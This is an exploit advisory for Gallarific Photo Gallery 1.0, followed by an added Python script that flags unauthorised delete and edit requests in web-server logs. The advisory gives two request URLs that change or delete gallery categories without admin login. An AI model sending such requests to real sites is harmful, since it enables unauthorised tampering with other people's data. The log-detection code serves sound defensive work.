# Gallarific Photo Gallery <= 1.0 Arbitrary Delete-Edit Category Vulnerability
//Author: iLker Kandemir -- MEFISTO
//Price : 47 $
//script demo : http://www.gallarific.com/demo/index.php
//[imhatimi.org]
----------------------------------------------------------------
//exploit :

1) http://[site]/gadmin/gallery.php?task=delete&id=1

2) http://[site]/gadmin/gallery.php?task=edit&id=1
----------------------------------------------------------------
//Note:
/* You don't need access to admin-panel ;) */

side note:
Original Advisory without PoC : http://secunia.com/advisories/29399

# milw0rm.com [2009-08-12]
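
Added example (not part of the original advisory or of Gallarific's code): a web-server log check for the two request patterns listed above, flagging task=delete and task=edit requests to /gadmin/gallery.php that come from addresses outside an admin allow-list. The combined log format, the ADMIN_IPS allow-list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
ADMIN_SCRIPT = "/gadmin/gallery.php"   # path named in the advisory
STATE_CHANGING = {"delete", "edit"}    # task values named in the advisory
ADMIN_IPS = {"192.0.2.10"}             # hypothetical allow-list of admin hosts

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Aug/2009:10:01:02 +0000] "GET /gadmin/gallery.php?task=delete&id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Aug/2009:10:02:00 +0000] "GET /gadmin/gallery.php?task=edit&id=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Aug/2009:10:03:10 +0000] "GET /photos/gadmin/gallery.php?id=2&task=EDIT HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Aug/2009:10:04:00 +0000] "GET /gallery.php?task=delete&id=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Aug/2009:10:05:00 +0000] "GET /gadmin/gallery.php?task=view&id=1 HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

def find_unauthorised_admin_hits(lines, admin_ips=ADMIN_IPS):
    """Return (ip, timestamp, task, id, status) for every delete/edit request
    to the admin gallery script from an address outside the allow-list."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["ip"] in admin_ips:
            continue
        url = urlsplit(m["target"])
        # Decode %-escapes and ignore case so trivial rewrites still match;
        # endswith() covers installs below the web root (e.g. /photos/...).
        if not unquote(url.path).lower().endswith(ADMIN_SCRIPT):
            continue
        query = parse_qs(url.query)
        tasks = {t.lower() for t in query.get("task", [])}
        for task in sorted(tasks & STATE_CHANGING):
            category_id = query.get("id", ["?"])[0]
            hits.append((m["ip"], m["ts"], task, category_id, int(m["status"])))
    return hits

if __name__ == "__main__":
    for hit in find_unauthorised_admin_hits(SAMPLE_LOG):
        print("ALERT ip=%s time=%s task=%s id=%s status=%d" % hit)
```

A flagged request only shows that the admin script was reached from an unexpected address; compare the category ids in the alerts against the gallery's current contents to see what was changed.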